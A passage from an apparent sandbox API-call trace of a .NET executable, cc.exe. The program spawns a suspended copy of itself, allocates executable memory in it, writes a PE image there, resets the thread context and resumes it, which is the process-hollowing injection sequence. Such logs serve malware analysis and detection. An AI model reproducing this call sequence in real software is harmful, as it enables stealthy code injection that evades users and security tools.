0xc1bb [0069.849] CoTaskMemFree (pv=0x43c7d0) [0069.850] GetModuleHandleW (lpModuleName=0x0) returned 0x13d0000 [0069.850] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.34f5582_r14_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0x13d0000, lpParam=0x0) returned 0x8010a [0069.852] SetWindowLongW (hWnd=0x8010a, nIndex=-4, dwNewLong=2005870045) returned 83364758 [0069.854] GetWindowLongW (hWnd=0x8010a, nIndex=-4) returned 2005870045 [0069.859] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x36e77c | out: phkResult=0x36e77c*=0x278) returned 0x0 [0069.859] RegQueryValueExW (in: hKey=0x278, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x36e79c, lpData=0x0, lpcbData=0x36e798*=0x0 | out: lpType=0x36e79c*=0x0, lpData=0x0, lpcbData=0x36e798*=0x0) returned 0x2 [0069.860] RegQueryValueExW (in: hKey=0x278, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x36e79c, lpData=0x0, lpcbData=0x36e798*=0x0 | out: lpType=0x36e79c*=0x0, lpData=0x0, lpcbData=0x36e798*=0x0) returned 0x2 [0069.860] RegCloseKey (hKey=0x278) returned 0x0 [0069.926] SetWindowLongW (hWnd=0x8010a, nIndex=-4, dwNewLong=83364798) returned 2005870045 [0069.926] GetWindowLongW (hWnd=0x8010a, nIndex=-4) returned 83364798 [0069.926] GetWindowLongW (hWnd=0x8010a, nIndex=-16) returned 113311744 [0069.928] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc059 [0069.928] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x8010a, Msg=0x24, wParam=0x0, lParam=0x36ea54) returned 0x0 [0069.929] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc0de [0069.929] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x8010a, Msg=0x81, wParam=0x0, lParam=0x36ea48) returned 0x1 [0069.929] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x8010a, Msg=0x83, wParam=0x0, lParam=0x36ea34) returned 0x0 [0069.930] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x8010a, Msg=0x1, wParam=0x0, lParam=0x36ea48) returned 0x0 [0069.930] GetClientRect (in: hWnd=0x8010a, lpRect=0x36e7b0 | out: lpRect=0x36e7b0) returned 1 [0069.930] GetWindowRect (in: hWnd=0x8010a, lpRect=0x36e7b0 | out: lpRect=0x36e7b0) returned 1 [0069.932] GetParent (hWnd=0x8010a) returned 0x0 [0069.932] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1b260001) returned 1 [0070.360] EtwEventRegister () returned 0x0 [0070.507] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36ec64) returned 1 [0070.507] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\cc.exe.config" (normalized: "c:\\users\\keecfmwgj\\desktop\\cc.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x36ef28 | out: lpFileInformation=0x36ef28*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0070.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ec60) returned 1 [0070.901] CoCreateGuid (in: pguid=0x36caac | out: pguid=0x36caac*(Data1=0x105043e6, Data2=0x3bc2, Data3=0x44ff, Data4=([0]=0x97, [1]=0x10, [2]=0x3c, [3]=0x98, [4]=0xe5, [5]=0x75, [6]=0xbb, [7]=0x69))) returned 0x0 [0071.082] CoCreateGuid (in: pguid=0x36caac | out: pguid=0x36caac*(Data1=0xaa8a62e2, Data2=0x7146, Data3=0x4537, Data4=([0]=0x88, [1]=0x20, [2]=0xe4, [3]=0x25, [4]=0x51, [5]=0x36, [6]=0xb7, [7]=0xef))) returned 0x0 [0071.108] CoCreateGuid (in: pguid=0x36caac | out: pguid=0x36caac*(Data1=0x899b86e9, Data2=0x2aec, Data3=0x44e4, Data4=([0]=0xad, [1]=0xb5, [2]=0xd5, [3]=0xf2, [4]=0xbf, [5]=0x40, [6]=0x20, [7]=0x8))) returned 0x0 [0071.134] CoCreateGuid (in: pguid=0x36caac | out: pguid=0x36caac*(Data1=0xae868cbf, Data2=0x4051, Data3=0x48c7, Data4=([0]=0xae, [1]=0xbc, [2]=0xec, [3]=0x6, [4]=0x3e, [5]=0x2c, [6]=0x12, [7]=0xba))) returned 0x0 [0071.157] CoCreateGuid (in: pguid=0x36caac | out: pguid=0x36caac*(Data1=0xa5d354fc, Data2=0xf00f, Data3=0x4998, Data4=([0]=0xb3, [1]=0x87, [2]=0x7, [3]=0x18, [4]=0x95, [5]=0xa, [6]=0x93, [7]=0x2b))) returned 0x0 [0071.185] CoCreateGuid (in: pguid=0x36caac | out: pguid=0x36caac*(Data1=0x95a3dd5b, Data2=0x8262, Data3=0x4f49, Data4=([0]=0xb2, [1]=0x65, [2]=0x2e, [3]=0xfe, [4]=0x3c, [5]=0xb9, [6]=0xe3, [7]=0x7d))) returned 0x0 [0071.211] CoCreateGuid (in: pguid=0x36caac | out: pguid=0x36caac*(Data1=0xa8f6ba89, Data2=0xdad9, Data3=0x4373, Data4=([0]=0xa2, [1]=0x4f, [2]=0x2f, [3]=0x27, [4]=0x99, [5]=0xa3, [6]=0x5a, [7]=0x5f))) returned 0x0 [0071.241] CoCreateGuid (in: pguid=0x36caac | out: pguid=0x36caac*(Data1=0x6f4c7b8b, Data2=0xfdd1, Data3=0x4dda, Data4=([0]=0xb1, [1]=0x75, [2]=0x32, [3]=0xd8, [4]=0x13, [5]=0xb1, [6]=0xe1, [7]=0xec))) returned 0x0 [0071.337] CreateProcessAsUserW (in: hToken=0x0, lpApplicationName="C:\\Users\\kEecfMwgj\\Desktop\\cc.exe", lpCommandLine="\"C:\\Users\\kEecfMwgj\\Desktop\\cc.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x36f044*(cb=0x24, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x24, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36f138 | out: lpCommandLine="\"C:\\Users\\kEecfMwgj\\Desktop\\cc.exe\"", lpProcessInformation=0x36f138*(hProcess=0x2d0, hThread=0x2cc, dwProcessId=0xf94, dwThreadId=0xf98)) returned 1 [0071.354] GetThreadContext (in: hThread=0x2cc, lpContext=0x28f5aa0 | out: lpContext=0x28f5aa0*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x14095ce, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0071.366] ReadProcessMemory (in: hProcess=0x2d0, lpBaseAddress=0x7efde008, lpBuffer=0x0, nSize=0x4, lpNumberOfBytesRead=0x36f16c | out: lpBuffer=0x0, lpNumberOfBytesRead=0x36f16c) returned 0 [0071.368] VirtualAllocEx (hProcess=0x2d0, lpAddress=0x400000, dwSize=0x29000, flAllocationType=0x3000, flProtect=0x40) returned 0x0 [0071.368] VirtualAllocEx (hProcess=0x2d0, lpAddress=0x0, dwSize=0x29000, flAllocationType=0x3000, flProtect=0x40) returned 0x60000 [0071.373] WriteProcessMemory (in: hProcess=0x2d0, lpBaseAddress=0x60000, lpBuffer=0x3852360*, nSize=0x200, lpNumberOfBytesWritten=0x36f16c | out: lpBuffer=0x3852360*, lpNumberOfBytesWritten=0x36f16c*=0x200) returned 1 [0071.380] WriteProcessMemory (in: hProcess=0x2d0, lpBaseAddress=0x61000, lpBuffer=0x387b180*, nSize=0x27c00, lpNumberOfBytesWritten=0x36f16c | out: lpBuffer=0x387b180*, lpNumberOfBytesWritten=0x36f16c*=0x27c00) returned 1 [0071.411] WriteProcessMemory (in: hProcess=0x2d0, lpBaseAddress=0x7efde008, lpBuffer=0x28f5d78*, nSize=0x4, lpNumberOfBytesWritten=0x36f16c | out: lpBuffer=0x28f5d78*, lpNumberOfBytesWritten=0x36f16c*=0x4) returned 1 [0073.416] SetThreadContext (hThread=0x2cc, lpContext=0x28f5aa0*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x41d460, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0073.418] ResumeThread (hThread=0x2cc) returned 0x1 [0073.556] GetCurrentActCtx (in: lphActCtx=0x36f16c | out: lphActCtx=0x36f16c*=0x0) returned 1 [0073.557] ActivateActCtx (in: hActCtx=0x437a54, lpCookie=0x36f17c | out: hActCtx=0x437a54, lpCookie=0x36f17c) returned 1 [0073.557] GetCurrentActCtx (in: lphActCtx=0x36ef8c | out: lphActCtx=0x36ef8c*=0x437a54) returned 1 [0073.649] GetModuleHandleW (lpModuleName=0x0) returned 0x13d0000 [0073.649] CreateWindowExW (dwExStyle=0x10000, lpClassName="WindowsForms10.Window.8.app.0.34f5582_r14_ad1", lpWindowName=0x0, 